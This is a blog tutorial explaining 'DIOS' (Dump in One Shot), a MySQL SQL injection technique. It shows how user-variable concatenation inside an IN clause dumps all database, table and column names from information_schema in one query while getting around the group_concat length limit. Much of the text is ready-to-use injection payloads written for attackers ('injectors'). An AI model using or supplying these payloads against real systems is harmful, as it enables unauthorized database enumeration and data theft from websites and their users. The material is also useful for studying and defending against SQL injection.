DIOS (Dump in One Shot) Explained

Post Image
Starting on the name of My god "Allah" the most beneficent the most merciful

I dont know if there is an explanation for DIOS already or is it explained in a more better way than the way i am going to expain but i know many of the injectors are searching for it, and even i am getting many requests to write a explanation on DIOS. So here lets start understanding DIOS and how it actually works. We will first make it easy and small then move step by step to complex ones. To understand DIOS you have to read the tutorial atleast twice with full concentration. If you think you will see it step by step and you will understand it easily then you are wrong and at the wrong place. So if you really want to understand then read it carefully.

Here is a Basic Query which gives us all the databases

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The above given query will give us all the databases in one shot. So let us try and understand how it actually works, for that we have to first understand the red colored part of the query. But before that we have to understand the use of in clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The Above statement specify to extract all the records from table where the name value is either 'inj3ct0r' or 'Zenodermus' or 'Security' or 'Idiots' which can also be written in another way by using OR as given below.

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

Output for both the statements will be same. So now lets move back to DIOS there we can see the innermost statemet which is

(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

Here whats happening is we are select a variable @a from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause. So what will actually happen is that all the schema names will come in 'IN' caluse and will get selected as they all exist in the table information_schema.schemata. As we can see above in the red part @a is concatenated with itself within a loop, each time "@a,schema_name,'<br>'" will be added to @a. Now lets see the rest part.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in ((@a:=concat(@a,schema_name,'<br>'))))a)

Now i guess you can understand we are selecting that concatenated variable @a in the first statement. Now lets move to our next query which gives us all the table names in one shot. One more thing the reason we use this query is because group_concat do not allow characters more than 1024, so in that case we can not extract much data from it. there are some other bypass for 1024 character limitation which is discussed over here at Death Row Injection.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query will give us all the table names in the same manner we got the database names, but this time we need to add a condition to remove all the tables which belongs to information_schema, below is the query for that.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the Query is giving us all the table names discluding the tables from information_schema. But again a problem is there that we can not see which table belongs to which database so we can also include table_schema each time while concatination.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we got all the Database Names and the table names, but we have a better option to get all the database names, table names and the Column names together by using information_schema.columns table.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now lets take a common challenge which gets posted to extract all the table names which are starting with 'shit_', so in that case we can use add up another condition as the below query shows.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in next part of DIOS explanataion.
Newer post

Basics XPATH Injection

Basics XPATH Injection
Basics of XPATH for XPATH Injection 2
Older post

Basics of XPATH for XPATH Injection 2